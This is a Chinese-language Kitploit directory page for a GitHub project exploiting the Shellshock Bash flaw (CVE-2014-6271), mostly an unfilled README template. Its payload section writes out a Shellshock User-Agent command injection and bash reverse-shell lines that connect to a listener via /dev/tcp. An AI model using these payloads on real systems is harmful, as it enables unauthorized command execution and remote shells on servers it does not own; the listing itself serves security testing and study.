Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Shell-Shock — *CVE-2014-6271* 通常被称为 Shell Shock 的 Unix 任意代码执行漏洞利用程序。示例、文档、事件响应和漏洞/风险评估,以及附加资源可能会转储在此处。尽情使用 :) --- somhmxxghoul --- | Kitploit
工具/GitHubGitHub/somhm-solutions/shell-shock
权限提升漏洞分析漏洞利用渗透测试学习与教育事件响应远程访问工具Payload 开发
GitHubsomhm-solutions/shell-shock

Shell-Shock

*CVE-2014-6271* 通常被称为 Shell Shock 的 Unix 任意代码执行漏洞利用程序。示例、文档、事件响应和漏洞/风险评估,以及附加资源可能会转储在此处。尽情使用 :) --- somhmxxghoul ---

查看仓库
136年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Shell Shock

*作者: [email protected] *维护者: ** *部门: DevOps *许可证: **

概述

Shell Shock: 特权提升,远程代码执行 Unix Bash Shell 中的一系列漏洞。允许执行任意命令。

利用向量


有效载荷

  • shellshock 用户代理 = User-Agent: () { :; } ; <$BASH_COMMAND>
  • rshell 载荷 = bash -i >& /dev/tcp/127.0.0.1
    • rshell 重定向到监听器 = bash -i >& /dev/tcp/$YOUR_IP:$PORT

技巧

设计:

  • 目的:
  • 内容:
  • 服务器:
    • 应用:
    • 数据库:
  • 网络:
    • DNS:
    • 路由:
  • 应用依赖:
  • 依赖程序:

基本用法:

  • 用法:

  • 常见用例:

  • 示例:

测试

测试输入

  • 参数:
  • 操作:

测试输出

  • 输出:
  • 截图:
  • 视频:
  • 其他:

备注:* [选项]:

下载工具